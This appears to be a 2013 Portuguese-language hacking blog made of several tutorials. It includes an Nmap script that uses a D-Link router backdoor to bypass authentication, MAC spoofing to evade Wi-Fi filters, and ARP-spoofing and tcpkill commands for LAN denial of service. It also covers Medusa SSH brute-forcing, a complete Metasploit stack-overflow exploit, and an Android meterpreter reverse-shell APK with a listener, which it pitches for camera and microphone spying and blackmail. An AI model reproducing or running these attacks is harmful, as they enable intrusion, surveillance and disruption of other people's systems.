segunda-feira, 21 de outubro de 2013

Android - MacSpoofing

Bom, eu acho que você já encontrou a situação que eles querem se conectar a um Wi-Fi com a senha, mas não foram autorizados em porque você filtro de mac, e precisa mudar seu mac pela lista para se conectar.
Isto pode ser feito de duas maneiras, e, obviamente, como raiz:

1: BusyBox Necessário e Terminal Emulator



busybox ifconfig

busybox ifconfig tiwlan0 down
busybox ifconfig tiwlan0 hw ether <AquítuMac>
busybox ifconfig tiwlan0 up

2: Com explorer raiz, digite / etc / wl, alterar a montagem de leitura / gravação clicando em "Mount R / W" e digite "nvram.txt" e escrever uma nova linha, digite o seguinte: "macaddr = xx : xx: xx: xx: xx: xx "(substituir xx: xx .. o mac que querem trazer)

Credito: NeoInvasor BCA
 

Explorando Nova falha D-link

071009_d-link_855 | hacking Primeiro tópico de muitos sobre redes wireless, como sempre wifi vulnerável. Recentemente eu postei como uma notícia que um pesquisador achou uma falha em roteadores D-link como todos sabem os roteadores D-link São muitos utilizados mundo a fora.  O que acontece é programadores como sempre para facilitar a vida deles mesmo, desenvolveram um backdoor para manutenção dos roteadores isso se resume em facilitar na atualização.
A falha foi encontrada pelo pesquisador de segurança Craig Heffner, da Tactical Network Solutions. O especialista em sistemas de comunicação sem fio escreveu em seu blog que a interface web de alguns roteadores da D-Link poderia ser acessada por meio da sequência “xmlset_roodkcableoj28840ybtide” em um navegador comum.
Vamos lá.
primeiramente precisamos abrir o terminal e fazer um simples scanner no roteador.
para saber o getway digite o comando abaixo
root:~$ route 
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
link-local * 255.255.0.0 U 1000 0 0 wlan0
192.168.1.0 * 255.255.255.0 U 2 0 0 wlan0
192.168.18.0 * 255.255.255.0 U 0 0 0 vmnet1
192.168.157.0 * 255.255.255.0 U 0 0 0 vmnet8
pronto já sabemos qual o endereço do roteador, agora vamos configurar o Nmap para instalar o plugin com a falha do D-link
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
description = [[
Detects a firmware backdoor on some D-Link routers by changing the User-Agent
to a "secret" value. Using the "secret" User-Agent bypasses authentication
and allows admin access to the router.
 
The following router models are likely to be vulnerable: DIR-100, DIR-120,
DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240
 
In addition, several Planex routers also appear to use the same firmware:
BRL-04UR, BRL-04CW
 
Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
]]
 
---
-- @usage
-- nmap -sV --script http-dlink-backdoor <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-dlink-backdoor:
-- |   VULNERABLE:
-- |   Firmware backdoor in some models of D-Link routers allow for admin password bypass
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
-- |
-- |     References:
-- |_      http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
---
 
author = "Patrik Karlsson <patrik@cqure.net>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit","vuln"}
 
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
 
portrule = shortport.http
 
action = function(host, port)
    local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true })
    local server = response.header and response.header['server']
    local vuln_table = {
        title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass",
        state = vulns.STATE.NOT_VULN,
        risk_factor = "High",
        description = [[
D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
]],
        references = {
        }
    }
    if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or
        ( response.status == 302 and server:match("^Alpha_webserv") ) then
        response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } })
 
        if ( response.status == 200 ) then
            vuln_table.state = vulns.STATE.VULN
            local report = vulns.Report:new(SCRIPT_NAME, host, port)
            return report:make_output(vuln_table)
        end
    end
    return
end
criei um arquivo com a extração .nse vai ficar assim http-dlink-backdoor.nse
olhe nos prints abaixo como ficará
chmodsecurity msfc0d3r
Cole o código acima:
Exploit http d-link
depois pressione Ctrl + x e depois enter para salvador o arquivo
próximo passo é adicionar dentro da pasta do Nmap esse arquivo que criamos.
root:~$ cd http-dlink-backdoor.nse /usr/local/share/nmap/scripts/
falha no d-link
agora podemos utiliza-lo para conseguir o login da parte de administração do roteador.
nmap -sV –script http-dlink-backdoor 192.168.1.1
D-Link roteadores foram encontrados com um backdoor firmware permitindo desvio senha de administrador usando uma seqüência de “senhas” User-Agent.
Uma pena que meu roteador não ser D-link, e você que tem um TP-LInk e pensa que está seguro ? eu tenho um TP-link e ja conseguir o password com outros exploit, para roteadores lembrando que esse processo so poderá ser efetuado se você estiver inserido na rede que vai atacar,ou seja, so em rede local.
acesse o blog do criador e entre em mais detalhes.

http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/


Credito: CHMOD SECURITY E MHARCOS NESTER.....

Backdoor em Roteadores D-link


Uma backdoor foi encontrada no firmware usado em diversos modelos de roteadores da marca D-Link. Esta falha poderia permitir a um hacker acessar as configurações do dispositivo, resultando em um grave problema de segurança.
backdoor d-link
A falha foi encontrada pelo pesquisador de segurança Craig Heffner, da Tactical Network Solutions. O especialista em sistemas de comunicação sem fio escreveu em seu blog que a interface web de alguns roteadores da D-Link poderia ser acessada por meio da sequência “xmlset_roodkcableoj28840ybtide” em um navegador comum.
Curiosamente, se a segunda metade desta sequência for invertida e os números forem removidos, lê-se a frase “edit by joel backdoor” (“editado por joel backdoor”), o que sugere que o código foi colocado intencionalmente.
“Meu palpite é que os desenvolvedores perceberam que alguns programas e serviços necessitavam ter suas configurações alteradas automaticamente”, disse Heffner. “Percebendo que o servidor web já possuía todo o código para alterar essas configurações, eles decidiram apenas enviar solicitações para o servidor sempre que precisassem mudar alguma coisa”.
Em teoria, isso poderia tornar o processo mais simples para programadores da D-Link, principalmente quando fosse necessário realizar atualizações de firmware remotamente nos roteadores. Por outro lado, deixa um grande rombo na segurança desses aparelhos.
O caso traz à lembrança os documentos da NSA vazados por Edward Snowden, que sugerem que a agência norte-americana possuía uma maneira de passar pela segurança de dispositivos graças a backdoors plantadas intencionalmente. É claro, existe sempre a possibilidade de ser apenas um erro ou uma má decisão de um programador.
Para encontrar outros modelos vulneráveis, Heffner usou o mecanismo de busca Shodan, serviço  que permite encontrar computadores e dispositivos conectados à rede. De acordo com ele, o mesmo firmware é encontrado nos seguintes modelos de roteadores da D-Link: DIR- 100, DI- 524, DI- 524UP , DI- 604S , DI- 604UP , DI -604 + , TM- G5240 e, possivelmente, o DIR- 615.
Dados de mercado revelam que ao menos 250 milhões de usuários utilizam esses roteadores em suas redes. Não bastasse isso, buscando na rede, Heffner encontrou o código sendo citado em um fórum russo há três anos, o que significa que alguém sabe da brecha há bastante tempo.

D-Link responde

D-Link informou que está trabalhando junto a Heffner e outros pesquisadores de segurança para descobrir mais detalhes sobre a backdoor. Ela também está conduzindo uma revisão em seus produtos para ver se a brecha está presente em outros modelos.
A empresa afirma que logo liberará uma atualização de firmware para fechar a porta. Enquanto isso, os usuários devem desabilitar o acesso remoto a seus roteadores, se possível.
Matéria completa: http://canaltech.com.br/noticia/seguranca/Backdoor-encontrada-em-roteadores-da-D-Link-atinge-milhoes-de-usuarios/#ixzz2iBfnGtoO
O conteúdo do Canaltech é protegido sob a licença Creative Commons (CC BY-NC-ND). Você pode reproduzi-lo, desde que insira créditos COM O LINK para o conteúdo original e não faça uso comercial de nossa produção.
Fontes: http://canaltech.com.br

Credito: Mharcos Nester...........

Negação de Serviços em Wifi | Chmod security


 Então Negação de Serviços é um ataque que nunca gostei, mesmo assim é um ataque interessante pois afeta a disponibilidade que é um dos três pilares da segurança da informação. Agora vamos para definição “Um ataque de negação de serviço (também conhecido como DoS Attack, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores.  ” wiki , pois bem esse tipo de ataque geralmente é feito em servidores web para que o serviço caiam precisa de uma quantidade considera de pacotes ou requisições para o servidor web fazendo com que ele não suporte e caia, é parecido com o ENEM quando ta faltando 2 dias para terminar as inscrições :) , muita gente acessando o mesmo site ao mesmo tempo nessa caso os brasileiros né que tem o costume de deixar tudo para cima da hora, olha só o estrago que pode acontecer, é como fosse uma “quebra de braço”,  onde quem tiver a Banda Melhor ganha.
ataque-dos

Na imagem a cima podemos observar que um usuário normal manda apenas uma requisição enquanto o atacante manda cetenas de requisições para  o servidor web, ele simula o ultimo dia para se inscrever no ENEM kkk. :D
E como seria um ataque desse em um ambiente local ou interno? estamos falando de uma rede wireless. vamos para nosso laboratório.
vamos utilizar a ferramenta tcpkill, o nome dela já diz né matar as conexões tcp , mas primeiro temos que habilitar o ip_forward como fizemos lá no tutorial de “capturar credenciais” quem não viu ainda voltar e ver para que serve esse comando.
#echo “1″ /proc/sys/net/ipv4/ip_forward
1
pronto agora podemos continuar.
vamos para o reconhecimento do lab.
então temos:
Maquina alvo: 192.168.0.100
Ip do getway(roteador): 192.168.0.1
agora vamos abrir dois terminais
root#arpspoof -i eth0 -t 192.168.0.1 192.168.0.100
root#arpspoof -i eth0 -t  192.168.0.100 192.168.0.1
arpspoof -> Serve para redirecionar pacotes a partir de um host-alvo (ou todos os hosts).
esta é uma forma extremamente eficaz de sniffing tráfego em um interruptor.
próximo passo vamos usar o dsniff
root:#dsniff -i eth0
detecta automaticamente e minimamente analisa cada
protocolo de aplicação, e só salva os interessante bits, apenas registrando
autenticação única tentativas. completa o TCP/IP remontagem é
fornecidos pela libnids.
e o final onde vamos deixar o serviço com a porta 80 inacessível.
# tcpkill -i eth0 dst 192.168.0.1 and dst port 80
:) , pronto afetamos uns dos pilares de segurança que é a disponibilidade :D  
depois fazer esse tipo de ataque usando também um smartphone com sistema Android  que é ainda mais legal pois é portátil e fácil  manuseio
com a ferramenta DSploit entre outras, porém é preciso rootiar seu aparelho primeiramente se quiser a ferramenta para seu Android é só deixar nos cometários que coloco pra download.:@
talvez colocarei uma categoria para android se a procura pelas ferramentas for maior até uma pagina com as melhores ferramentas para pentest com android.


Creditos : Mharcos Nester.........Retirando Diretamente do site CHMOD SECURITY..:)

terça-feira, 17 de setembro de 2013

Tutorial: Usando o Maltego para o levantamento de informações

Tutorial: Utilizando o Maltego para o levantamento de informações.

Olá a todos !

Dessa vez vou mostrar como usar a ferramenta Maltego disponível no Kali Linux para fazer o levantamento de informações.

Essa ferramenta é bastante simples e poderosa, já vem instalada por padrão no Kali Linux e ao abrir pela primeira vez é solicitado um registro para conseguir login e senha, faça o registro inicial e depois vamos por as mãos na massa.


A ferramenta fica no menu Applications/Kali Linux/Top 10 Security Tools/Maltego

Ao abrir clique em New quando for exibido o Palette conforme abaixo do lado esquerdo arraste o ícone “Domain” para o centro, do lado esquerdo abaixo será possível colocar o nome do domínio que deseja obter as informações.





Depois clique com o botão direito no ícone que vc criou e aponte para Run Transforms e clique em All Transforms.

Talvez seja exibida algumas caixas de confirmação ou alguns erros mas vá clicando em OK e no final vc verá um gráfico com todas as informações que foram obtidas como email, contato, informações sobre servidores e algumas outras.

Espero que tenham gostado da dica. vlw !!!

domingo, 11 de agosto de 2013


Instalar e configurar Tor Browser no Android

Olá a todos
Gostaria de mostrar pra vcs essa dica de como Instalar e configurar o Tor Browser no Android.
Nesse caso estou usando um Galaxy Nexus com acesso Root

Baixe o aplicativo oficial do Tor aqui
https://play.google.com/store/apps/details?id=org.torproject.android
Ao abrir a primeira vez podemos selecionar o idioma, selecione o português brasileiro, ou o de sua preferência.
Avançando será exibida uma tela com um botão para solicitar acesso root, selecione esse botão e dê acesso root.
Será exibido uma tela semelhante a essa:







Se marcarmos a opção Proxy All Apps Through Tor todos aplicativos farão acesso através do Tor.
Ou podemos selecionar o botão abaixo e clicando podemos definir qual App que queremos acessar a internet usando TOR. No meu caso aqui testei com sucesso selecionando apenas o Google Chrome
Avance e será exibida uma tela semelhante a essa:







A princípio o botão estará cinza, mas daí se pressionarmos o botão por alguns segundos ele vai conectar e ficar como acima, daí é só começar a navegar.
Para saber se deu certo você pode acessar o site www.omeuip.com e ver se o seu IP foi mudado realmente.
Nas configurações do programa é possível selecionar outros aplicativos para acessar via Tor.
Espero que tenham gostado da Dica.
Ajude a divulgar compartilhando
Até a próxima.

sábado, 3 de agosto de 2013

Utilizando o Medusa

Utilizando Medusa

Uma boa ferramenta que podemos utilizar para ataques remotos obtendo
senha através de força bruta é a Medusa. A ferramenta em modo texto não
deixa nada a desejar, as opções de uso podem ser verificadas através do co-
mando medusa –h, conforme exibido a seguir:

A sintaxe de utilização é simples e para nosso teste vamos utilizar como alvo o host 192.186.32.132 rodando um serviço SSH.

#medusa -h
Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file]
-M module [OPT]

No teste anterior, utilizamos o comando medusa –h 192.168.32.132 , buscan-
do o host 192.168.32.132, -n 22 especificando a porta 22, -u root setando o
usuário root, -P /root/senhas_ssh.txt referencia o arquivo de senhas criado
que em nosso caso é senhas_ssh.txt, por fim, -M ssh habilitando o módulo
SSH. Repare que, mais uma vez, obtivemos sucesso e o medusa nos retorna
o usuário root e senha 12345678.

root@root:~# medusa -h 192.168.32.132 -n 22 -u root -P /root/senhas_ssh.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
The default build of Libssh2 is to use OpenSSL for crypto. Several Linux distributions (e.g. Debian, Ubuntu) build it to use Libgcrypt. Unfortunately, the implementation within Libssh2 of libgcrypt appears to be broken and is not thread safe. If you run multiple concurrent Medusa SSH connections, you are likely to experience segmentation faults. Please help Libssh2 fix this issue or encourage your distro to use the default Libssh2 build options.

ACCOUNT CHECK: [ssh] Host: 192.168.32.132 (1 of 1, 0 complete) User: root (1 of 1, 0
complete) Password: jacare (1 of 14 complete)

quarta-feira, 31 de julho de 2013

Resolvendo problema do wpscan pós-atualização do Kali Linux

Resolvendo problema do wpscan pós-atualização do Kali Linux 

 Após a atualização no meu Kali Linux, ao tentar utilizar a ferramenta wpscan, apareceu esse problema: 





Após uma breve procura pelo google, eu achei a solução. Que é bem simples, basta você digitar esses comandos no seu terminal:
# apt-get install ruby1.9.1
# apt-get install ruby1.9.1-dev

# apt-get install --reinstall gem
# gem install bundler
# bundle install --gemfile=/usr/share/wpscan/Gemfile
# apt-get update
vlw, até o próximo post !

 

terça-feira, 30 de julho de 2013

Adicionando exploit ao metasploit

 Adicionando Exploit ao MSF

Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, por motivos de organização:
O que estou adicionando? Para qual sistema operacional ele é útil? O que ele
explora?

Entendeu mais ou menos?

Vou explicar. Vamos para o diretório padrão do msf, para isso digite:

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# ls

HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts 
root@bt:/pentest/exploits/framework3#

Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em
/opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:

root@bt:/pentest/exploits/framework3# cd modules/

Agora em exploits. (O que estou adicionando?)

root@bt:/pentest/exploits/framework3/modules# cd exploits/

Em windows. (Para qual sistema operacional ele é útil?)

root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/

E por fim em misc. (O que ele explora?)

root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/

Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua
preferência.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano
exploit_stackoverflow.rb

Agora insira o exploit abaixo:

http://pastebin.com/raw.php?i=H26uL5ih

#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote


include Msf::Exploit::Remote::Tcp


def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',


'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,


'Privileged' => false
))


register_options(
[
Opt::RPORT(200)
], self.class)
end


def exploit
connect


junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)


handler
disconnect


end


end




Créditos do exploit para: “Peter Van Eeckhoutte


Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.

Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc#msfconsole



Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.



Meterpreter para Android



Há um tempo atrás, começou uma movimentação entre o pessoal que cuida de um fork do Metasploit, para desenvolver diversas funcionalidades que não existem na versão original mantida atualmente pela Rapid7. E dentre essas funcionalidades, está o Meterpreter Java portado para Android.

Já tem um bom tempo que estamos no aguardo de um Meterpreter para Linux, pois só havia uma versão para Windows, e algumas tentativas para o Linux, mas essa versão para Android, também é hiper bem vinda!

Para quem quiser dar uma olhada nessa nova funcionalidade, basta baixar essa versão do Metasploit, ou fazer a atualização de sua instalação com o comando ./msfupdate.

Logo abaixo, vocês podem ver o resultado desse comando atualizando o Metasploit com essa funcionalidade:

./msfupdate 
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[...]
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java


Além disso, podemos visualizar se o mesmo já está instalado:
./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp                  Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp                        Connect back stager, Spawn a piped command shell (sh)



E para testá-lo, podemos criar um payload que permite termos uma conexão reversa:

./msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.102 R > shell.apk


É interessante, que nesse caso específico, precisamos definir que o formato de saída do payload será RAW (por isso o parâmetro "R"), mas nesse caso em específico, apesar da saída ser RAW, o msfpayload cria um arquivo APK no formato específico do Android. Vejamos:

file shell.apk 
shell.apk: Zip archive data, at least v2.0 to extract

Depois de criado o arquivo, basta que instalemos o mesmo em um dispositivo Android, para vermos seu funcionamento. Mas antes de instalá-lo, vamos deixar nossa máquina escutando, à espera de uma conexão vinda do dispositivo Android:


./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E


Na imagem acima, podemos ver a conexão reversa sendo realizada e o resultado do comando sysinfo.

Com esse meterpreter, podemos tirar fotos a partir da câmera do dispositivo Android, tanto a dianteira quanto a traseira, se houver. Outras duas interessantes possibilidades, é acionar o microfone do dispositivo para gravação de áudio ambiente e de ligações, e também a utilização do terminal do dispositivo como se fosse um micro remoto. Obviamente que existem outras, e deixo vocês testarem por conta própria :-)


Ok, até aí, quando pensamos em usuários comuns, não vejo muitos problemas, a não ser, obviamente, a invasão de privacidade. Por exemplo, imagine você sendo chantageado, porque um cara descobriu que em sua última ida ao motel, não foi sua esposa que lhe acompanhou (ou vice-versa) ;-)

Mas pensemos em uma grande corporação, onde  o termo BYOD (Bring Your Own Device) está em voga e sendo implementado (sem os devidos controles de segurança)... O que será que pode ser descoberto gravando o áudio de um dispositivo utilizado por um executivo durante suas reuniões? E as fotos dos locais que ele frequenta?

Mas ainda assim isso é pouco...

Acredito que os(as) senhores(as), que já utilizaram o Metasploit (principalmente quem já fez algum curso de pentest comigo) conheçam o termo pivoting, que basicamente é a utilização de uma sessão do meterpreter, sendo utilizada como rota para tráfego de rede. Podemos fazer isso com o portfw também, como descrito nessa documentação da Offensive Security - http://www.offensive-security.com/metasploit-unleashed/Portfwd . Executando o comando abaixo, realizamos isso:

meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
[*] Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80

Com esse procedimento, qualquer dispositivo Android que tenha acesso à rede interna de uma companhia, e que tenha sido comprometido por um atacante, torna-se uma porta de entrada para todos os recursos acessíveis para o funcionário dono do mesmo. E se esse funcionário, mais uma vez, for um executivo? E se esse executivo deixa seus filhos utilizarem seu smartphone ou tablet para instalar joguinhos sem conhecer a procedência ou confiabilidade dos mesmos?

Durmam com isso na mente!

Essa é uma preocupação que eu mesmo tenho, já que atuo com forense. Podem ver minha palestra sobre forense em Android aqui:
Vídeo - http://hackproofing.blogspot.com.br/2013/05/video-de-palestra-androids-forensic.html
Slides - http://hackproofing.blogspot.com.br/2012/05/slides-androids-forensics-you-shot.html



Creditos: Luiz Vieira....

Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box

 como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.
O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.
Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.
Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. No final vou colocar um link com uma série de tutoriais que podem ser executados usando o Kali. Vamos lá?
1 – Criar a máquina virtual:
Vamos criar uma nova e atribuir um nome
ScreenHunter_07 Apr. 03 16.09
Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB
ScreenHunter_08 Apr. 03 16.09
Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB
ScreenHunter_11 Apr. 03 16.10
Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.
ScreenHunter_11 Apr. 03 16.11
Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site
ScreenHunter_12 Apr. 03 16.11
2 – Instalar o Kali Linux
Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”
ScreenHunter_12 Apr. 03 16.12
Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12
Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo
ScreenHunter_14 Apr. 03 16.14
Defina a senha do usuário Root
ScreenHunter_15 Apr. 03 16.15
Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar
ScreenHunter_16 Apr. 03 16.16
Nessa tela, podemos selecionar a primeira opção e avançar
ScreenHunter_18 Apr. 03 16.16
Podemos avançar, e na próxima tela selecionar “YES”
ScreenHunter_18 Apr. 03 16.17
Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.
ScreenHunter_19 Apr. 03 16.36
Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar
ScreenHunter_20 Apr. 03 16.36
Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.
ScreenHunter_20 Apr. 03 16.44
3 – Configurações iniciais.
O primeiro passo é instalar o VBOX Additions para isso faça o seguinte abra um terminal e digite:
apt-get update && apt-get install -y linux-headers-$(uname -r)
Aguarde a conclusão da instalação
Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”
ScreenHunter_20 Apr. 03 16.57
Quando for exibido essa tela, clique em cancelar
ScreenHunter_20 Apr. 03 17.00
Execute agora os seguintes comandos no terminal.
cp /media/cdrom0/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
Aguarde a conclusão da instalação e reinicie a VM
Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:
service postgresql start && service metasploit start
aguarde a conclusão e depois digite:
update-rc.d postgresql enable && update-rc.d metasploit enable
Para iniciar basta acessar conforme a imagem
metasploit-kali-metasploit-framework
Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:
apt-get install tor tor-geoipdb polipo vidalia
Feito isso digite
mkdir /var/run/tor
chmod 700 /var/run/tor/
Vamos configurar o polipo para acessar através do tor para isso digite
vim /etc/polipo/config
Descomente as linhas
allowedClientes 127.0.0.1
socksParentProxy = “localhost:9050?
socksParentType = socks5
salve e saia do arquivo e digite
service tor restart
service polipo restart
Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050
Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy
Para instalar o EtherApe basta digitar
apt-get install etherape
Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Realizando um ataque de negação de serviço usando tcpkill – Dos (Ethical Hacking)

Para esse tutorial estou usando o Kali Linux, para instalar e configurar essa ferramenta vc pode seguir essa nossa dica aqui
O primero passo é habilitar o repasse entre as interfaces de rede para isso faça o seguinte:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Abrir 4 terminais como root
No primeiro, executar o arpspoof e no segundo também, de uma vítima para outra e virce-versa.
# arpspoof -i eth0 -t vm1 vm2
# arpspoof -i eth0 -t vm2 vm1
Troque VM1 pelo IP do Servidor que está executando um determinado serviço, SSH, FTP, RDP etc..
Troque VM2 pelo IP da Vítima que não vai conseguir acessar o servidor.
Em outro terminal digite esse comando
# dsniff -i eth0
Por último digite esse em outro terminal
# tcpkill -i eth0 dst vm1 and dst port 22
Troque VM1 pelo IP do Servidor e coloque a porta deseja que seja derrubada, 22, 3389, 21 etc
Espero que tenham gostado da dica.
Usem com sabedoria
Postagens mais antigas → Página inicial
Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86